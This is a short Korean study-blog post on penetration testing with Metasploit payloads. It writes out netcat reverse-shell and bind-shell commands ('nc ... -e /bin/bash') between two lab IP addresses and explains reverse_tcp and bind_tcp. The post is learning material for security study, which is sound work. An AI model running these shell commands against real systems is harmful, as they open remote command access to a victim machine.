Study Record

[모의해킹 MSF] payload 본문

모의해킹

[모의해킹 MSF] payload

초코초코초코 2021. 11. 8. 23:53
728x90

Command Injection : 코드를 주입해서 원하는 동작을 실행할 수 있다.

 

nc CMD

 

listener (192.168.10.50)                     ←                server (192.168.10.134)

# nc -l -p 7979                                                      # nc 192.168.10.50 7979 -e /bin/bash

 

→ listener 쪽에서 server 쪽의 명령어를 입력할 수 있다. server 쪽에서 명령어를 보내도 listener에서는 반응을 하지 않는다. 

 

listener (192.168.10.50)                     ←                server (192.168.10.134)

# nc -l -p 7979 -e /bin/bash                                 # nc 192.168.10.50 7979 

 

→ server 쪽에서 listener 쪽의 명령어를 입력할 수 있다. listener 쪽에서 명령어를 보내도 server에서는 반응을 하지 않는다.

 

reverse_tcp

: 피해 시스템에서 공격자한테 연결을 시도한다

bind_tcp

: 피해 시스템에서 listener 역할을 하고 공격자가 연결을 시도한다.

 

728x90